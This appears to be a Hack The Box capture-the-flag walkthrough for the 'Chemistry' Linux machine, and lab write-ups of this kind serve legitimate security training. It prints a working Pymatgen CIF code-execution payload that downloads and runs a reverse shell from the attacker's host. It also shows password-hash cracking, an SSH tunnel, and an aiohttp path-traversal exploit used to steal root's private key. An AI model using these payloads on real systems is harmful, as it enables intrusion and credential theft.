> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / LINUX / 2026-03-27

Hack The Box — Chemistry (Linux)

Initial access through a Pymatgen CIF parser RCE, lateral move to user rosa, then root via an aiohttp path traversal vulnerability.

Target

  • IP: 10.129.203.194

Recon

sudo nmap -sC -sV 10.129.203.194 -p- -T5 -v

22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open  upnp?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Sat, 19 Oct 2024 21:08:41 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Chemistry - Home</title>
|     <link rel="stylesheet" href="/static/styles.css">
|     </head>
|     <body>
|     <div class="container">
|     class="title">Chemistry CIF Analyzer</h1>
|     <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
|     <div class="buttons">
|     <center><a href="/login" class="btn">Login</a>
|     href="/register" class="btn">Register</a></center>
|     </div>
|     </div>
|     </body>
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Go to http:/10.129.203.194:5000/. From the Server header, we can see the site is built with Werkzeug/3.0.3 Python/3.9.5. Register with any username and password.

We can upload a CIF file. The site lets us download a sample file. There is a vulnerability with a public exploit:

  • https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f

See the attached file attachments/rev.py, which contains a Python reverse shell.

Start a netcat listener and a Python web server:

nc -vlnp 4444
python3 -m http.server 80

Upload example.cif, intercept the request with Burp, and send it to Repeater.

Change the file content to:

data_5yOhtAoR

_audit_creation_date            2018-06-08

_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"



loop_

_parent_propagation_vector.id

_parent_propagation_vector.kxkykz

k1 [0 0 0]



_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("curl http://10.10.16.26/rev.py -o /dev/shm/rev.py");0,0,0'

Send the request. On the website, view example.cif.

Then change the payload to:

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("python3 /dev/shm/rev.py");0,0,0'

Send the request again. On the site, view example.cif again. We get a reverse shell as user app.

python3 -c 'import pty;pty.spawn("/bin/bash")'
# CTRL-Z
stty raw -echo
fg

cat /etc/passwd

From this output, we notice user rosa.

cat app.py

We notice:

app.config['SECRET_KEY'] = 'MyS3cretCh3mistry4PP'

sqlite3 instance/database.db

select * from user;

3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5

Put the hash in a hash file and crack it:

hashcat -a 0 -m 0 ./hash ./rockyou.txt

We get password unicorniosrosados.

ssh rosa@10.129.203.194

Enter the recovered password.

ps aux

We notice:

root        1040  0.0  1.3  35524 27552 ?        Ss   07:20   0:00 /usr/bin/python3.9 /opt/monitoring_site/app.py

ss -ltpn

rosa@chemistry:~$ ss -ltpn
State        Recv-Q        Send-Q               Local Address:Port               Peer Address:Port       Process
LISTEN       0             4096                 127.0.0.53%lo:53                      0.0.0.0:*
LISTEN       0             128                        0.0.0.0:22                      0.0.0.0:*
LISTEN       0             128                        0.0.0.0:5000                    0.0.0.0:*
LISTEN       0             128                      127.0.0.1:8080                    0.0.0.0:*
LISTEN       0             128                           [::]:22                         [::]:*

Tunnel port 8080:

ssh rosa@10.129.203.194 -NL 5555:localhost:8080

Go to http://localhost:5555/. From HTTP response headers we notice:

Server: Python/3.9 aiohttp/3.9.1

There is a vulnerability with a PoC:

  • https://github.com/z3rObyte/CVE-2024-23334-PoC
git clone https://github.com/z3rObyte/CVE-2024-23334-PoC.git

Edit exploit.sh like this:

url="http://localhost:5555"
payload="/assets/"

bash exploit.sh

We obtain /etc/passwd. Change the target file to root/.ssh/id_rsa and run again:

bash exploit.sh

We obtain root's private key. Save it to root_key and set permissions:

chmod 600 root_key

ssh root@10.129.203.194 -i root_key

We get a shell as root.